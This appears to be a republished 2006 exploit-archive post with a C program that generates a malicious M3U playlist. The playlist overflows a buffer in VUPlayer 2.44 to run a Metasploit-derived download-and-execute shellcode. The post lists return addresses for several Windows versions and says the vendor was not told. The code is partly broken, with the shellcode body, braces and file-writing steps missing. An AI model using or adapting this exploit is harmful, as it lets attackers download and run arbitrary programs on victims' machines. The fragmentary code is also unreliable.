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VUPlayer <= 2.44 (M3U UNC Name) Buffer Overflow Exploit (c)
来源:GLinares.code@gmail.com 作者:Greg 发布时间:2006-12-01  

_______ ________ .__ _____ __
___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __
\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ /
> <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| <
/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \
\/ \/ \/ \/ 30\11\06 \/ |__| \/ \/

* mm. dM8
* YMMMb. dMM8 _____________________________________
* YMMMMb dMMM' [ ]
* `YMMMb dMMMP [ There are doors I have yet to open ]
* `YMMM MMM' [ windows I have yet to look through ]
* "MbdMP [ Going forward may not be the answer ]
* .dMMMMMM.P [ ]
* dMM MMMMMM [ maybe I should go back ]
* 8MMMMMMMMMMI [_____________________________________]
* YMMMMMMMMM www.netbunny.org
* MxM .mmm
* W"W """

[i] Title: VUPlayer <= 2.44 m3u parsing remote buffer overflow
[i] Discovered by: Greg Linares - glinares.code [aaat] gmail [dooot] com
[i] Exploit by: Expanders - expanders [aaat] gmail [dooot] com
[i] References: http://www.vuplayer.com/
[i] Greatings: x0n3-h4ck - netbunny

[ Research diary ]

A classical buffer overflow. if we supply less than 800 bytes of buffer we can trigger an access violation
and we can overwrite SEH handler. btw stack gets too much contaminated with lowecase transforming, section repetitions
and a lot of bad things that make exploiting quite impossible.
Well... if we make it eat a thousand of bytes we can really overwrite some juicy RET sections and full controlling EIP.

[ Timeline ]

Vendor hasn't been informed. Feel free to do it if you want ;)

[ Notes ]

RETcode type: POINTER TO [ESP]
To improve realiability you can search your own RETcodes..

[ Documentation ]

Skylined Alpha2 : www.edup.tudelft.nl/~bjwever/documentation_alpha2.html.php

[ Special Thanks ]

H D Moore
Greg Linares <--- He really kicks ass!

[ Links ]



#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>

// Exploit internals, change only if you know what you are doing
#define BUGSTR "#EXTM3U\n#EXTINF:470,x0n3-h4ck - omg they kick asses.wma\n%s"
#define BUFFSIZE 5000
#define SC_MAX_SIZE 800
#define MAX_ENCODED_LEN 200

// Offsets
#define RET_OFFSET 1012

int encode_alphanum(unsigned char *src,unsigned char *dest,int len);
int banner();
int usage(char *filename);
int remote_connect( char* ip, unsigned short port );

// win32 download and execute taken from metasploit [ tnx hdm, lion & pita ]
// encoded using Skylined alpha2 tool
char alphanum_dax_shellcode[] =
// Skylined's alpha2 alphanumeric decoder
// Encoded opcodes

struct retcodes{char *platform;unsigned long addr;} targets[]= {
{ "VUPlayer 2.40 2.41 2.42", 0x01020F4F }, // vu_wma.dll push esp, ret
{ "VUPlayer 2.43 2.44" , 0x01030F4F }, // vu_wma.dll push esp, ret
{ "Windows 2k SP 4" , 0x75031dce }, // ws2_32.dll push esp, ret [Tnx to metasploit]
{ "Windows XP SP 0/1" , 0x71ab7bfb }, // ws2_32.dll jmp esp [Tnx to metasploit]
{ "Windows XP SP 2 ENG" , 0x71ab9372 }, // ws2_32.dll push esp, ret [Tnx to metasploit]
{ "Windows XP SP 2 ITA" , 0x77D92CFC }, // user32.dll jmp esp
{ NULL }

int banner() {
printf("\n _______ ________ .__ _____ __ \n");
printf("___ __\\ _ \\ ____ \\_____ \\ | |__ / | | ____ | | __ \n");
printf("\\ \\/ / /_\\ \\ / \\ _(__ < ______ | | \\ / | |__/ ___\\| |/ / \n");
printf(" > <\\ \\_/ \\ | \\/ \\ /_____/ | Y \\/ ^ /\\ \\___| < \n");
printf("/__/\\_ \\\\_____ /___| /______ / |___| /\\____ | \\___ >__|_ \\ \n");
printf(" \\/ \\/ \\/ \\/ \\/ |__| \\/ \\/ \n\n");
printf("[i] Title: \tVUPlayer <= 2.44 m3u Playlist Buffer overflow\n");
printf("[i] Discovered by:\tGreg Linares\n");
printf("[i] Exploit by: \tExpanders\n\n");
return 0;

int usage(char *filename) {
int i;
printf("Usage: \t%s <filename> <url> <targ>\n\n",filename);
printf(" \t<filename> : Output filename\n");
printf(" \t<url> : Complete url of the executable to download\n");
printf(" \t<targ> : Target from the list below\n\n");
printf("Ex: \t%s exploit.m3u http://www.x0n3-h4ck.org/calc.exe 0\n\n",filename);

printf("# \t Platform\n");
for(i = 0; targets[i].platform; i++)
printf("%d \t %s\n",i,targets[i].platform);

int main(int argc, char *argv[]) {
FILE *output;
int position;
char encoded_url[MAX_ENCODED_LEN];
char *buffer;
if( (argc != 4) || (strstr("http://",argv[2]) < 0) )
printf("[+] Target OS is: %s\n",targets[atoi(argv[3])].platform);
printf("[+] Creating evil buffer...");
buffer = (char *) malloc(BUFFSIZE);
position = 0;
memset(buffer,0x41,RET_OFFSET); position += RET_OFFSET;
memcpy(buffer+position,&targets[atoi(argv[3])].addr,4); position += 4;
memcpy(buffer+position,alphanum_dax_shellcode,strlen(alphanum_dax_shellcode)); position += strlen(alphanum_dax_shellcode);
memcpy(buffer+position,encoded_url,strlen(encoded_url)); position += strlen(encoded_url);
printf("[+] Opening file...");
if(!(output = fopen(argv[1],"w"))) {
return 1;
printf("[+] Writing stuff into the file\n");
printf("[+] Done! %s created!\n",argv[1]);
return 0;

// Ripped from Skylined's alpha2.c
int encode_alphanum(unsigned char *dest,unsigned char *src,int len){
char dump[2];
int i,n, input, A, B, C, D, E, F;
char* valid_chars;
struct timeval tv;
struct timezone tz;
gettimeofday(&tv, &tz);
valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
for(n=0;n<len;n++) {
input = src[n];
A = (input & 0xf0) >> 4;
B = (input & 0x0f);
F = B;
i = rand() % strlen(valid_chars);
while ((valid_chars[i] & 0x0f) != F) { i = ++i % strlen(valid_chars); }
E = valid_chars[i] >> 4;
D = (A^E);
i = rand() % strlen(valid_chars);
while ((valid_chars[i] & 0x0f) != D) { i = ++i % strlen(valid_chars); }
C = valid_chars[i] >> 4;
sprintf(dump,"%c%c", (C<<4)+D, (E<<4)+F);
return 0;

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